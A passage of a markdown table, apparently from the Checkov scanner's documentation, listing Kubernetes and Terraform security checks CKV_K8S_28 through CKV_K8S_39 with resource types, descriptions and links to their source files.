[DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) | +| 2792 | CKV_K8S_28 | resource | Job | Minimize the admission of containers with the NET_RAW capability | Kubernetes | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) | +| 2793 | CKV_K8S_28 | resource | Pod | Minimize the admission of containers with the NET_RAW capability | Kubernetes | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) | +| 2794 | CKV_K8S_28 | resource | PodTemplate | Minimize the admission of containers with the NET_RAW capability | Kubernetes | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) | +| 2795 | CKV_K8S_28 | resource | ReplicaSet | Minimize the admission of containers with the NET_RAW capability | Kubernetes | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) | +| 2796 | CKV_K8S_28 | resource | ReplicationController | Minimize the admission of containers with the NET_RAW capability | Kubernetes | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) | +| 2797 | CKV_K8S_28 | resource | StatefulSet | Minimize the admission of containers with the NET_RAW capability | Kubernetes | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) | +| 2798 | CKV_K8S_28 | resource | kubernetes_deployment | Minimize the admission of containers with the NET_RAW capability | Terraform | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py) | +| 2799 | CKV_K8S_28 | resource | kubernetes_deployment_v1 | Minimize the admission of containers with the NET_RAW capability | Terraform | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py) | +| 2800 | CKV_K8S_28 | resource | kubernetes_pod | Minimize the admission of containers with the NET_RAW capability | Terraform | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py) | +| 2801 | CKV_K8S_28 | resource | kubernetes_pod_v1 | Minimize the admission of containers with the NET_RAW capability | Terraform | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py) | +| 2802 | CKV_K8S_29 | resource | CronJob | Apply security context to your pods and containers | Kubernetes | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py) | +| 2803 | CKV_K8S_29 | resource | DaemonSet | Apply security context to your pods and containers | Kubernetes | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py) | +| 2804 | CKV_K8S_29 | resource | Deployment | Apply security context to your pods and containers | Kubernetes | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py) | +| 2805 | CKV_K8S_29 | resource | Job | Apply security context to your pods and containers | Kubernetes | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py) | +| 2806 | CKV_K8S_29 | resource | Pod | Apply security context to your pods and containers | Kubernetes | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py) | +| 2807 | CKV_K8S_29 | resource | ReplicaSet | Apply security context to your pods and containers | Kubernetes | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py) | +| 2808 | CKV_K8S_29 | resource | ReplicationController | Apply security context to your pods and containers | Kubernetes | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py) | +| 2809 | CKV_K8S_29 | resource | StatefulSet | Apply security context to your pods and containers | Kubernetes | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py) | +| 2810 | CKV_K8S_29 | resource | kubernetes_daemon_set_v1 | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) | +| 2811 | CKV_K8S_29 | resource | kubernetes_daemonset | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) | +| 2812 | CKV_K8S_29 | resource | kubernetes_deployment | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) | +| 2813 | CKV_K8S_29 | resource | kubernetes_deployment_v1 | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) | +| 2814 | CKV_K8S_29 | resource | kubernetes_pod | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) | +| 2815 | CKV_K8S_29 | resource | kubernetes_pod_v1 | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) | +| 2816 | CKV_K8S_30 | resource | CronJob | Apply security context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) | +| 2817 | CKV_K8S_30 | resource | DaemonSet | Apply security context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) | +| 2818 | CKV_K8S_30 | resource | Deployment | Apply security context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) | +| 2819 | CKV_K8S_30 | resource | DeploymentConfig | Apply security context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) | +| 2820 | CKV_K8S_30 | resource | Job | Apply security context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) | +| 2821 | CKV_K8S_30 | resource | Pod | Apply security context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) | +| 2822 | CKV_K8S_30 | resource | PodTemplate | Apply security context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) | +| 2823 | CKV_K8S_30 | resource | ReplicaSet | Apply security context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) | +| 2824 | CKV_K8S_30 | resource | ReplicationController | Apply security context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) | +| 2825 | CKV_K8S_30 | resource | StatefulSet | Apply security context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) | +| 2826 | CKV_K8S_30 | resource | kubernetes_deployment | Apply security context to your pods and containers | Terraform | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py) | +| 2827 | CKV_K8S_30 | resource | kubernetes_deployment_v1 | Apply security context to your pods and containers | Terraform | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py) | +| 2828 | CKV_K8S_30 | resource | kubernetes_pod | Apply security context to your pods and containers | Terraform | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py) | +| 2829 | CKV_K8S_30 | resource | kubernetes_pod_v1 | Apply security context to your pods and containers | Terraform | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py) | +| 2830 | CKV_K8S_31 | resource | CronJob | Ensure that the seccomp profile is set to docker/default or runtime/default | Kubernetes | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py) | +| 2831 | CKV_K8S_31 | resource | DaemonSet | Ensure that the seccomp profile is set to docker/default or runtime/default | Kubernetes | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py) | +| 2832 | CKV_K8S_31 | resource | Deployment | Ensure that the seccomp profile is set to docker/default or runtime/default | Kubernetes | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py) | +| 2833 | CKV_K8S_31 | resource | Job | Ensure that the seccomp profile is set to docker/default or runtime/default | Kubernetes | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py) | +| 2834 | CKV_K8S_31 | resource | Pod | Ensure that the seccomp profile is set to docker/default or runtime/default | Kubernetes | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py) | +| 2835 | CKV_K8S_31 | resource | ReplicaSet | Ensure that the seccomp profile is set to docker/default or runtime/default | Kubernetes | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py) | +| 2836 | CKV_K8S_31 | resource | ReplicationController | Ensure that the seccomp profile is set to docker/default or runtime/default | Kubernetes | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py) | +| 2837 | CKV_K8S_31 | resource | StatefulSet | Ensure that the seccomp profile is set to docker/default or runtime/default | Kubernetes | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py) | +| 2838 | CKV_K8S_32 | resource | PodSecurityPolicy | Ensure default seccomp profile set to docker/default or runtime/default | Kubernetes | [SeccompPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SeccompPSP.py) | +| 2839 | CKV_K8S_32 | resource | kubernetes_pod_security_policy | Ensure default seccomp profile set to docker/default or runtime/default | Terraform | [SeccompPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SeccompPSP.py) | +| 2840 | CKV_K8S_33 | resource | CronJob | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) | +| 2841 | CKV_K8S_33 | resource | DaemonSet | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) | +| 2842 | CKV_K8S_33 | resource | Deployment | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) | +| 2843 | CKV_K8S_33 | resource | DeploymentConfig | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) | +| 2844 | CKV_K8S_33 | resource | Job | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) | +| 2845 | CKV_K8S_33 | resource | Pod | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) | +| 2846 | CKV_K8S_33 | resource | PodTemplate | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) | +| 2847 | CKV_K8S_33 | resource | ReplicaSet | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) | +| 2848 | CKV_K8S_33 | resource | ReplicationController | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) | +| 2849 | CKV_K8S_33 | resource | StatefulSet | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) | +| 2850 | CKV_K8S_34 | resource | CronJob | Ensure that Tiller (Helm v2) is not deployed | Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) | +| 2851 | CKV_K8S_34 | resource | DaemonSet | Ensure that Tiller (Helm v2) is not deployed | Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) | +| 2852 | CKV_K8S_34 | resource | Deployment | Ensure that Tiller (Helm v2) is not deployed | Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) | +| 2853 | CKV_K8S_34 | resource | DeploymentConfig | Ensure that Tiller (Helm v2) is not deployed | Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) | +| 2854 | CKV_K8S_34 | resource | Job | Ensure that Tiller (Helm v2) is not deployed | Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) | +| 2855 | CKV_K8S_34 | resource | Pod | Ensure that Tiller (Helm v2) is not deployed | Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) | +| 2856 | CKV_K8S_34 | resource | PodTemplate | Ensure that Tiller (Helm v2) is not deployed | Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) | +| 2857 | CKV_K8S_34 | resource | ReplicaSet | Ensure that Tiller (Helm v2) is not deployed | Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) | +| 2858 | CKV_K8S_34 | resource | ReplicationController | Ensure that Tiller (Helm v2) is not deployed | Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) | +| 2859 | CKV_K8S_34 | resource | StatefulSet | Ensure that Tiller (Helm v2) is not deployed | Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) | +| 2860 | CKV_K8S_34 | resource | kubernetes_deployment | Ensure that Tiller (Helm v2) is not deployed | Terraform | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py) | +| 2861 | CKV_K8S_34 | resource | kubernetes_deployment_v1 | Ensure that Tiller (Helm v2) is not deployed | Terraform | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py) | +| 2862 | CKV_K8S_34 | resource | kubernetes_pod | Ensure that Tiller (Helm v2) is not deployed | Terraform | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py) | +| 2863 | CKV_K8S_34 | resource | kubernetes_pod_v1 | Ensure that Tiller (Helm v2) is not deployed | Terraform | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py) | +| 2864 | CKV_K8S_35 | resource | CronJob | Prefer using secrets as files over secrets as environment variables | Kubernetes | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) | +| 2865 | CKV_K8S_35 | resource | DaemonSet | Prefer using secrets as files over secrets as environment variables | Kubernetes | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) | +| 2866 | CKV_K8S_35 | resource | Deployment | Prefer using secrets as files over secrets as environment variables | Kubernetes | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) | +| 2867 | CKV_K8S_35 | resource | DeploymentConfig | Prefer using secrets as files over secrets as environment variables | Kubernetes | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) | +| 2868 | CKV_K8S_35 | resource | Job | Prefer using secrets as files over secrets as environment variables | Kubernetes | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) | +| 2869 | CKV_K8S_35 | resource | Pod | Prefer using secrets as files over secrets as environment variables | Kubernetes | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) | +| 2870 | CKV_K8S_35 | resource | PodTemplate | Prefer using secrets as files over secrets as environment variables | Kubernetes | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) | +| 2871 | CKV_K8S_35 | resource | ReplicaSet | Prefer using secrets as files over secrets as environment variables | Kubernetes | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) | +| 2872 | CKV_K8S_35 | resource | ReplicationController | Prefer using secrets as files over secrets as environment variables | Kubernetes | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) | +| 2873 | CKV_K8S_35 | resource | StatefulSet | Prefer using secrets as files over secrets as environment variables | Kubernetes | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) | +| 2874 | CKV_K8S_35 | resource | kubernetes_deployment | Prefer using secrets as files over secrets as environment variables | Terraform | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py) | +| 2875 | CKV_K8S_35 | resource | kubernetes_deployment_v1 | Prefer using secrets as files over secrets as environment variables | Terraform | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py) | +| 2876 | CKV_K8S_35 | resource | kubernetes_pod | Prefer using secrets as files over secrets as environment variables | Terraform | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py) | +| 2877 | CKV_K8S_35 | resource | kubernetes_pod_v1 | Prefer using secrets as files over secrets as environment variables | Terraform | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py) | +| 2878 | CKV_K8S_36 | resource | PodSecurityPolicy | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilitiesPSP.py) | +| 2879 | CKV_K8S_36 | resource | kubernetes_pod_security_policy | Minimise the admission of containers with capabilities assigned | Terraform | [MinimiseCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilitiesPSP.py) | +| 2880 | CKV_K8S_37 | resource | CronJob | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) | +| 2881 | CKV_K8S_37 | resource | DaemonSet | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) | +| 2882 | CKV_K8S_37 | resource | Deployment | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) | +| 2883 | CKV_K8S_37 | resource | DeploymentConfig | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) | +| 2884 | CKV_K8S_37 | resource | Job | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) | +| 2885 | CKV_K8S_37 | resource | Pod | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) | +| 2886 | CKV_K8S_37 | resource | PodTemplate | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) | +| 2887 | CKV_K8S_37 | resource | ReplicaSet | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) | +| 2888 | CKV_K8S_37 | resource | ReplicationController | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) | +| 2889 | CKV_K8S_37 | resource | StatefulSet | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) | +| 2890 | CKV_K8S_37 | resource | kubernetes_deployment | Minimise the admission of containers with capabilities assigned | Terraform | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py) | +| 2891 | CKV_K8S_37 | resource | kubernetes_deployment_v1 | Minimise the admission of containers with capabilities assigned | Terraform | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py) | +| 2892 | CKV_K8S_37 | resource | kubernetes_pod | Minimise the admission of containers with capabilities assigned | Terraform | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py) | +| 2893 | CKV_K8S_37 | resource | kubernetes_pod_v1 | Minimise the admission of containers with capabilities assigned | Terraform | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py) | +| 2894 | CKV_K8S_38 | resource | CronJob | Ensure that Service Account Tokens are only mounted where necessary | Kubernetes | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py) | +| 2895 | CKV_K8S_38 | resource | DaemonSet | Ensure that Service Account Tokens are only mounted where necessary | Kubernetes | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py) | +| 2896 | CKV_K8S_38 | resource | Deployment | Ensure that Service Account Tokens are only mounted where necessary | Kubernetes | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py) | +| 2897 | CKV_K8S_38 | resource | Job | Ensure that Service Account Tokens are only mounted where necessary | Kubernetes | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py) | +| 2898 | CKV_K8S_38 | resource | Pod | Ensure that Service Account Tokens are only mounted where necessary | Kubernetes | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py) | +| 2899 | CKV_K8S_38 | resource | ReplicaSet | Ensure that Service Account Tokens are only mounted where necessary | Kubernetes | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py) | +| 2900 | CKV_K8S_38 | resource | ReplicationController | Ensure that Service Account Tokens are only mounted where necessary | Kubernetes | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py) | +| 2901 | CKV_K8S_38 | resource | StatefulSet | Ensure that Service Account Tokens are only mounted where necessary | Kubernetes | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py) | +| 2902 | CKV_K8S_39 | resource | CronJob | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) | +| 2903 | CKV_K8S_39 | resource | DaemonSet | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) | +| 2904 | CKV_K8S_39 | resource | Deployment | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) | +| 2905 | CKV_K8S_39 | resource | DeploymentConfig | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) | +| 2906 | CKV_K8S_39 | resource | Job | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) | +| 2907 | CKV_K8S_39 | resource | Pod | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) | +| 2908 | CKV_K8S_39 | resource | PodTemplate | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) | +| 2909 | CKV_K8S_39 | resource | ReplicaSet | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) | +| 2910 | CKV_K8S_39 | resource | ReplicationController | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) | +| 2911 | CKV_K8S_39 | resource | StatefulSet | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) | +| 2912 | CKV_K8S_39 | resource | kubernetes_deployment | Do not use the CAP_SYS_ADMIN linux capability | Terraform | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py) | +| 2913 | CKV_K8S_39 | resource | kubernetes_deployment_v1 | Do not use the CAP_SYS_ADMIN linux capability | Terraform | 